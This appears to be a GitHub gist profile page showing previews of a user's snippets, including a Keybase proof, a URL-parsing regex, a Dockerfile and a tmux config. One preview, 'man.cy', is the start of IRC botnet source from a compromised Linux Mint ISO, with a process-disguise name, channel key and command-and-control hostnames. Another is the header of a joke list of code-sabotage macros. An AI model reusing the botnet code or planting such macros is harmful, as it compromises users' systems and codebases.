Skip to content

Instantly share code, notes, and snippets.

View curtiszimmerman's full-sized avatar

Z curtiszimmerman

  • Planet Earth
View GitHub Profile

Keybase proof

I hereby claim:

  • I am curtiszimmerman on github.
  • I am curtiszimmerman (https://keybase.io/curtiszimmerman) on keybase.
  • I have a public key whose fingerprint is 676A E051 FB2B 3FC8 09C3 EF90 0142 3347 9E8A E4BF

To claim this, I am signing this object:

/* bling.js */
window.$ = document.querySelectorAll.bind(document)
Node.prototype.on = window.on = function (name, fn) {
this.addEventListener(name, fn)
}
NodeList.prototype.__proto__ = Array.prototype
@curtiszimmerman
curtiszimmerman / preprocessor_fun.h
Last active August 29, 2015 14:27 — forked from aras-p/preprocessor_fun.h
Things to commit just before leaving your job
// Just before switching jobs:
// Add one of these.
// Preferably into the same commit where you do a large merge.
//
// This started as a tweet with a joke of "C++ pro-tip: #define private public",
// and then it quickly escalated into more and more evil suggestions.
// I've tried to capture interesting suggestions here.
//
// Contributors: @r2d2rigo, @joeldevahl, @msinilo, @_Humus_,
// @YuriyODonnell, @rygorous, @cmuratori, @mike_acton, @grumpygiant,
@curtiszimmerman
curtiszimmerman / nestedJSON.go
Created October 29, 2015 19:31
Nested JSON objects in Go
import (
"fmt"
"encoding/json"
)
/*
// example JSON object
{
@curtiszimmerman
curtiszimmerman / usefulShit.md
Created November 28, 2015 05:17
collection of interesting projects, websites, documents & articles, most realated to information security
/* *******************************************************************************
Hero authors of RFC 3986 (http://www.ietf.org/rfc/rfc3986.txt) gave us this regex
for parsing (well-formed) URLs into their constituent pieces:
^(([^:/?#]+):)?(//([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?
Which for the following URL:
http://www.ics.uci.edu/pub/ietf/uri/#Related
Yields in the following subexpression matches:
@curtiszimmerman
curtiszimmerman / man.cy
Created March 3, 2016 18:11 — forked from kurobeats/man.cy
man.cy from malicious Linux Mint iso
#define STARTUP 1
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "apt-cache" // What you want this to hide as
#define CHAN "#mint" // Channel to join
#define KEY "bleh" // The key of the channel
int numservers=5; // Must change this to equal number of servers down there
char *servers[] = {
"updates.absentvodka.com",
"updates.mintylinux.com",
"eggstrawdinarry.mylittlerepo.com",
@curtiszimmerman
curtiszimmerman / Dockerfile
Created May 19, 2016 20:21
Dockerfile for Ethereum C++ and Go implementations
FROM ubuntu:wily
MAINTAINER James Wheaton <jwheaton@kpmg.com>
ENV DEBIAN_FRONTEND noninteractive
RUN apt-get -y update &&\
apt-get -y install language-pack-en-base &&\
dpkg-reconfigure locales &&\
apt-get -y install software-properties-common &&\
apt-get upgrade -q -y && \
# make status bar more awesome
set -g status-utf8 on
set -g status-keys vi
set -g status-interval 1
set -g status-attr bright
set -g status-fg white
set -g status-bg black
set -g status-left-length 30
set -g status-left '#[fg=green][#[fg=red]#S - #(whoami) - #(cut -d " " -f 1-3 /proc/loadavg)#[fg=green]]#[default]'
set -g status-justify centre